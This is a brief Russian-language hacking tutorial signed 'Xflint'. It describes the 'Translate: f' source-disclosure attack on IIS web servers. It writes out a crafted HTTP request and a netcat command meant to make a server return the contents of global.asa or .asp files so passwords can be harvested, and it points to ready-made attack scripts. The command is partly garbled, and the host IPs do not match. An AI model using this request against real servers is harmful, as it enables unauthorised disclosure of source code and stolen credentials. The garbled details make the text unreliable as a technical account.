Атака translate f
[ Хакерство в Интернете ]
Эту атаку можно применять ко всем IIS. Для того чтобы её осуществить нам нужна утилита NetCat и любая прога преобразующая текст в шестнадцатирикный формат.
Создаём файл trans и в нём пишем :
GET /global. asa(Или *.asp) HTTP1.0
Host: 192.168.20.10
User-Agent: SensePostData
Content-Type: application/x-www-form-urlencoded
Translate: f
[CRLF]
[CRLF]
Внимание [CRLF] в шестнадцетиричном формате будет иметь вид 0D0A.
Преобразуем. теперь нужна утилита netcat
#cat trans > nc - nvv 192.168.234.41 80
В ответ мы получем содержание файла global. asa иногда там иожно найти пароли.
Так-же можно использовать сценарии tarans. pl и srcgrab. pl. Найти их можно в любом поисковике.
By Xflint
XFlint


